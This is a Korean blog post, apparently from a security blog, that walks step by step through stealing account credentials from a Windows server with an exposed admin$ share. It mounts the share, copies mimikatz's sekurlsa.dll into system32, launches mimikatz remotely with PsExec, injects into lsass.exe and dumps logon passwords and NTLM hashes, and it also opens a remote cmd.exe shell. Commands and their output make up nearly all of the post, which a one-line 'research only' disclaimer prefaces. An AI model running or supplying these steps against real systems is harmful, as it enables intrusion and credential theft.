Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
admin$ 공유를 이용하면 계정을 탈취할 수 있다.
특히 누구나 접근가능한 everyone으로 열린 admin$ 공유는 매우 위험하다.
이번시간에는 mimikatz를 이용해 admin$ 가 공유된 서버의 계정을 탈취해보겠다.
1. 연결정보 확인.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
C:\>net use * /y /delete 다음 원격 연결이 있습니다. \\192.168.0.100\admin$ 계속하면 연결이 취소됩니다. 명령을 잘 실행했습니다. C:\>net use 새 연결 정보가 저장됩니다. 목록에 항목이 없습니다. |
2. admin$ 공유를 net use으로 마운트
|
1 2 |
C:\>net use \\192.168.0.100\admin$ "pwd" /u:"user" 명령을 잘 실행했습니다. |
3. 연결 정보 확인.
|
1 2 3 4 5 6 7 8 |
C:\>net use 새 연결 정보가 저장됩니다. 상태 로컬 원격 네트워크 ------------------------------------------------------------------------------- OK \\192.168.0.100\admin$ Microsoft Windows Network 명령을 잘 실행했습니다. |
4. mimikatz 를 연결시키기 위해 dll 파일을 copy 한다.
|
1 2 |
C:\>copy C:\mimikatz\x64\sekurlsa.dll \\192.168.0.100\admin$\system32 1개 파일이 복사되었습니다. |
5. psexec.exe를 사용하여 해당장비에 mimikatz으로 remote 연결을 한다.
|
1 2 3 4 5 6 7 8 9 10 11 |
C:\>PsExec.exe /accepteula \\192.168.0.100 -c C:\mimikatz\x64\mimikatz.exe PsExec v2.1 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Jan 23 2013 00:14:12) */ // http://blog.gentilkiwi.com/mimikatz mimikatz # |
위와 같이 mimikatz 쉘이 떨어지면 성공이다.
6. debug모드로 변겅
|
1 2 |
mimikatz # privilege::debug Demande d'ACTIVATION du privil챔ge : SeDebugPrivilege : OK |
7. sekurlsa.dll 을 lsass.exe 프로세스에 injection 한다.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
mimikatz # inject::process lsass.exe sekurlsa.dll PROCESSENTRY32(lsass.exe).th32ProcessID = 288 Attente de connexion du client... Serveur connect챕 횪 un client ! Message du processus : Bienvenue dans un processus distant Gentil Kiwi SekurLSA : librairie de manipulation des donn챕es de s챕curit챕s dans LSASS ======================================== Les fonctions suivantes NE SONT PLUS support챕es via l'injection de la librairie sekurlsa.dll : @getLogonPasswords @getMSV(Functions) @getTsPkg(Functions) @getWDigest(Functions) @getLiveSSP(Functions) @getKerberos(Functions) Les m챗mes fonctionnalit챕s (et m챗me plus !) sont disponibles SANS INJECTION : sekurlsa::logonPasswords sekurlsa::msv sekurlsa::tspkg sekurlsa::wdigest sekurlsa::livessp sekurlsa::kerberos Vous pouvez d챕charger la librairie avec : @ Puis utiliser un module local, par exemple : sekurlsa::logonPasswords full ======================================== mimikatz # |
성공적으로 injection 되었다.
8. sekurlsa 모듈을 이용해서 logonPasswords를 절취한다.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;598048 Package d'authentification : Kerberos Utilisateur principal : administrator Domaine d'authentification : DOMAIN msv1_0 * Utilisateur : administrator * Domaine : DOMAIN * Hash LM : a9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx09 * Hash NTLM : d5xxxxxxxxxxxxxxxxxxxxxxxxxxxxd6 kerberos * Utilisateur : administrator * Domaine : DOMAINP.TEST.CO.KR * Mot de passe : passwd1234 ssp wdigest * Utilisateur : administrator * Domaine : DOMAIN * Mot de passe : password1234 Authentification Id : 0;10649521 Package d'authentification : Kerberos Utilisateur principal : apollo89 Domaine d'authentification : DOMAIN msv1_0 * Utilisateur : apollo89 * Domaine : DOMAIN * Hash LM : d1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1b * Hash NTLM : 38xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb2 kerberos * Utilisateur : apollo89 * Domaine : DOMAINP.TEST.CO.KR * Mot de passe : ssp wdigest * Utilisateur : apollo89 * Domaine : DOMAIN * Mot de passe : apollopwd mimikatz # |
대박!!
번외로 mimikatz가 아닌 직접 cmd.exe으로 접속하고 싶다면 아래와 같이 하면된다.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
C:\mimikatz\x64>PsExec.exe /accepteula \\192.168.0.100 cmd.exe PsExec v2.1 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.0.100 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.1 C:\WINDOWS\system32> |
참고 : http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
2 Responses to mimikatz를 이용해 admin$ 가 공유된 서버의 계정탈취